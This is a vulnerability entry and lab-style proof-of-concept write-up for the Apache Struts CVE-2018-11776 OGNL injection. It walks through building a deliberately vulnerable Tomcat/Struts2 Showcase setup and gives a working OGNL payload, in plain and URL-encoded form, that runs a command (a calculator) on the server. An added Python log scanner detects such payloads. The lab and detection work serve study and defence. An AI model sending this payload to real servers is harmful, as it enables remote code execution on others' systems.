Related vulnerability
Title:
Apache Struts input validation error vulnerability
(CVE-2018-11776)
Description: Apache Struts is an open-source project maintained by the Apache Software Foundation (USA). It is an open-source MVC framework for building enterprise Java web applications and ships mainly as two framework product lines, Struts 1 and Struts 2. Apache Struts 2 is the next-generation Struts product, a completely new framework built by merging the technology of Struts 1 and WebWork, with an architecture that differs considerably from Struts 1. Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16 contain an input validation vulnerability.
Description
Creating a vulnerable environment and the PoC
Introduction
# CVE-2018-11776
Proof of Concept exploit so I could quickly assess what sorts of protections and fixes are available.
Originally found by Man Yue Mo, Semmle: https://semmle.com/news/apache-struts-CVE-2018-11776
Semmle had a "Apache Struts RCE - CVE-2018-11776 - PoC Exploit Demo" YouTube video up for a bit, but I believe it's gone or, at least, no longer linked to Semmle: https://www.youtube.com/watch?v=5SDNX20SLJ0
Took information from the above and then started looking at the commits to the struts repo: https://github.com/apache/struts/commit/6e87474f9ad0549f07dd2c37d50a9ccd0977c6e5
I'm too lazy to Docker or whatever the fuck...
## Setting up and Exploiting a Vulnerable Host
### Download latest Ubuntu Desktop ISO and create a virtual machine.
http://releases.ubuntu.com/18.04.1/ubuntu-18.04.1-desktop-amd64.iso?_ga=2.265574989.317727484.1535056103-825490018.1535056103
### Install dependencies:
```sh
sudo apt-get update
sudo apt-get upgrade
sudo apt-get dist-upgrade
sudo apt-get install default-jdk vim net-tools
```
### Set up Tomcat:
```sh
mkdir ~/sources
cd ~/sources
wget http://mirrors.ocf.berkeley.edu/apache/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz
tar xvzf apache-tomcat-7.0.90.tar.gz
sudo mv apache-tomcat-7.0.90 /opt/tomcat
```
### Update bashrc with variables:
```sh
vim ~/.bashrc
# add these two lines to ~/.bashrc:
export JAVA_HOME=/usr/lib/jvm/default-java
export CATALINA_HOME=/opt/tomcat
# then reload it:
. ~/.bashrc
```
### Add an admin to the Tomcat gui:
```sh
sudo vim /opt/tomcat/conf/tomcat-users.xml
```
```xml
<user username="username" password="password" roles="manager-gui,admin-gui" />
```
### Get a vulnerable Struts2 Showcase so we have something to work with:
```sh
cd ~/sources
wget http://central.maven.org/maven2/org/apache/struts/struts2-showcase/2.3.14/struts2-showcase-2.3.14.war
```
### Deploy the WAR file through the Tomcat gui:
```sh
$CATALINA_HOME/bin/shutdown.sh
$CATALINA_HOME/bin/startup.sh
```
Then open http://127.0.0.1:8080/manager/html and upload the WAR.
### Restart Tomcat and check that the Struts2 Showcase is available:
```sh
$CATALINA_HOME/bin/shutdown.sh
$CATALINA_HOME/bin/startup.sh
```
Then check http://127.0.0.1:8080/manager/html
### Add a vulnerable redirection action without a namespace:
```sh
vim /opt/tomcat/webapps/struts2-showcase-2.3.14/WEB-INF/classes/struts.xml
```
```xml
<action name="help">
    <result type="redirectAction">
        <param name="actionName">date.action</param>
    </result>
</action>
```
`date.action` is already defined, so this just adds another action, `help`, that redirects to `date.action`.
By default, `alwaysSelectFullNamespace` should be set to true.
### Restart Tomcat and check out the Struts2 Showcase page:
```sh
$CATALINA_HOME/bin/shutdown.sh
$CATALINA_HOME/bin/startup.sh
```
Then open http://127.0.0.1:8080/struts2-showcase-2.3.14/showcase.jsp
### Create OGNL expression to do stuff. Let's do what Semmle probably did in their YouTube video:
```
%{(#_memberAccess['allowStaticMethodAccess'] = true).(#rt = @java.lang.Runtime@getRuntime()).(#rt.exec('gnome-calculator'))}
```
### The OGNL expression needs to be URL-encoded and placed before the last '/' in the URL, hitting our vulnerable help.action:
```
127.0.0.1:8080/struts2-showcase-2.3.14/<encoded-command-goes-here>/help.action
```
```
127.0.0.1:8080/struts2-showcase-2.3.14/%25%7B%28%23%5F%6D%65%6D%62%65%72%41%63%63%65%73%73%5B%27%61%6C%6C%6F%77%53%74%61%74%69%63%4D%65%74%68%6F%64%41%63%63%65%73%73%27%5D%20%3D%20%74%72%75%65%29%2E%28%23%72%74%20%3D%20%40%6A%61%76%61%2E%6C%61%6E%67%2E%52%75%6E%74%69%6D%65%40%67%65%74%52%75%6E%74%69%6D%65%28%29%29%2E%28%23%72%74%2E%65%78%65%63%28%27%67%6E%6F%6D%65%2D%63%61%6C%63%75%6C%61%74%6F%72%27%29%29%7D/help.action
```
Requesting this URL against the vulnerable Ubuntu host should pop up a new calculator instance.
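An added detection example, not part of the original PoC or README: it scans Tomcat access-log lines for the pattern used above, an OGNL marker (`%{` or `${`) hidden in a URL-encoded path segment, decoding up to two rounds so double-encoded requests are caught as well. The log lines are constructed samples and the log format is assumed to be Tomcat's common access-log pattern.

```python
import re
from urllib.parse import unquote

# Tomcat "common" access-log pattern (assumed): ip - user [time] "METHOD /path HTTP/x" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Markers that open an OGNL expression in Struts 2 (the payload above starts with %{)
OGNL_MARKERS = ("%{", "${")

# Constructed sample log lines: a benign request, then a single-encoded and a
# double-encoded OGNL marker injected in the path segment before help.action.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Aug/2018:10:01:02 +0000] "GET /struts2-showcase-2.3.14/showcase.jsp HTTP/1.1" 200 4821',
    '10.0.0.7 - - [24/Aug/2018:10:01:09 +0000] "GET /struts2-showcase-2.3.14/%25%7B(%23test)%7D/help.action HTTP/1.1" 302 0',
    '10.0.0.9 - - [24/Aug/2018:10:01:15 +0000] "GET /struts2-showcase-2.3.14/%2524%257B1%252B1%257D/help.action HTTP/1.1" 302 0',
]


def decode_path(path: str, rounds: int = 2) -> str:
    """URL-decode repeatedly (up to `rounds`) so double-encoded payloads are normalised too."""
    decoded = path
    for _ in range(rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def ognl_segment(path: str):
    """Return the first decoded path segment containing an OGNL marker, or None."""
    path_only = path.split("?", 1)[0]  # the query string is not the injection point here
    for segment in decode_path(path_only).split("/"):
        if any(marker in segment for marker in OGNL_MARKERS):
            return segment
    return None


def scan(lines):
    """Return (client ip, raw path, offending decoded segment) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not in the expected log format, skip it
        segment = ognl_segment(m.group("path"))
        if segment is not None:
            hits.append((m.group("ip"), m.group("path"), segment))
    return hits
```

Run `scan(SAMPLE_LOG)` (or feed it real lines from `localhost_access_log.*.txt`) to get one tuple per request carrying an OGNL marker in its path.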
### Related commits fixing the issue:
https://github.com/apache/struts/commit/6e87474f9ad0549f07dd2c37d50a9ccd0977c6e5
## Thoughts:
Another extremely specific, vulnerable implementation of struts. The media coverage of this vulnerability had everyone freaking out, though only the sloppiest code/configs are really vulnerable... I can't think of an efficient, stealthy way of reliably finding this vulnerability and/or exploiting it. My recommendation: just fucking upgrade struts... (or stop using it)